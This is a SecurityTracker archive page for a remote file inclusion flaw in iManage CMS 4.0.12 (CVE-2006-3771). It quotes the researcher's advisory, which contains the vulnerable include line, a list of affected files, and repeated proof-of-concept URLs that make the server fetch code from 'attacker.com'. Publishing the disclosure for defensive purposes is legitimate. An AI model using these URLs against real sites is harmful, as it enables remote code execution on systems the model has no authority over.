SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   iManage CMS Vendors:   imaginex resource
iManage CMS Include File Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016551
SecurityTracker URL:  http://securitytracker.com/id/1016551
CVE Reference:   CVE-2006-3771   (Links to External Site)
Updated:  Jun 13 2008
Original Entry Date:  Jul 21 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 4.0.12 and prior versions
Description:   A vulnerability was reported in iManage CMS. A remote user can include and execute arbitrary code on the target system.

The 'insert.php' script does not properly validate user-supplied input in the 'asolute_path' parameter. If register_globals is disabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Several other scripts are also affected.

Some demonstration exploit URLs are provided:

http://[target]/[path]/articles.php?absolute_path=http://attacker.com//inject.txt?

http://[target]/[path]/contact.php?absolute_path=http://attacker.com//inject.txt?

http://[target]/[path]/displaypage.php?absolute_path=http://attacker.com//inject.txt?

http://[target]/[path]/faq.php?absolute_path=http://attacker.com//inject.txt?

http://[target]/[path]/mainbody.php?absolute_path=http://attacker.com//inject.txt?

http://[target]/[path]/news.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/registration.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/whosOnline.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/components/com_calendar.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/components/com_forum.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/components/minibb/index.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/modules/mod_calendar.php?absolute_path=http://[attacker]//inject.txt?

The original advisory is available at:

http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt

Ahmad Maulana a.k.a Matdhule reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.imaginex-resource.com/imxrustice/index.php?option=articles&task=viewarticle&artid=8 (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File

ECHO.OR.ID

ECHO_ADV_40$2006

---------------------------------------------------------------------------------------------------

[ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion

---------------------------------------------------------------------------------------------------


Author          : Ahmad Maulana a.k.a Matdhule

Date Found      : July, 20th 2006

Location        : Indonesia, Jakarta

web             : http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt

Critical Lvl    : Highly critical

Impact          : System access

Where           : From Remote

---------------------------------------------------------------------------


Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iManage CMS from Imaginex-Resource


Application     : iManage CMS

version         : 4.0.12 stable

URL             : http://www.imaginex-resource.com


---------------------------------------------------------------------------


Vulnerability:

~~~~~~~~~~~~~~~~


-----------------------component.php----------------------

....

<?php

/**

*    iManage Version 4.0.12

*    Dynamic portal server and Content managment engine

*    03-02-2003

*

*    Copyright (C) 2000 - 2003 Imaginex-Resource

*

*    Site Name: iManage Version 4.0.12

*    File Name: rightComponent.php

*    Date: 31/01/2003

*     Version #: 4.0.12

*    Comments: Display all modules which are to be displayed on the right.

**/


include($absolute_path.'/language/'.$lang.'/lang_components.php');

...

----------------------------------------------------------


Input passed to the "absolute_path" parameter in insert.php is not

properly verified before being used. This can be exploited to execute

arbitrary PHP code by including files from local or external

resources


Affected files: 


articles.php

contact.php

displaypage.php

faq.php

mainbody.php

news.php

registration.php

whosOnline.php

components/com_calendar.php

components/com_forum.php

components/minibb/index.php

components/minibb/bb_admin.php

components/minibb/bb_plugins.php

modules/mod_calendar.php

modules/mod_browser_prefs.php

modules/mod_counter.php

modules/mod_online.php

modules/mod_stats.php

modules/mod_weather.php

themes/bizz.php

themes/default.php

themes/simple.php

themes/original.php

themes/portal.php

themes/purple.php


and more :)


Successful exploitation requires that "register_globals= Off ".


Proof Of Concept:

~~~~~~~~~~~~~~~~~


http://target.com/[path]/articles.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/contact.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/displaypage.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/faq.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/mainbody.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/news.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/registration.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/whosOnline.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/components/com_calendar.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/components/com_forum.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/components/minibb/index.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/modules/mod_calendar.php?absolute_path=http://attacker.com//inject.txt?


and more Affected files



Solution:

~~~~~~~~~

- Change register_globals= On 

  in php.ini

- Sanitize variable $absolute_path on affected files.


---------------------------------------------------------------------------

Shoutz:

~~~~~

~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson  :) 

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama

~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com

~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net

------------------------------------------------------------------------

---

Contact:

~~~~~~

 

     matdhule[at]gmail[dot]com

     

-------------------------------- [ EOF ]----------------------------------

 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC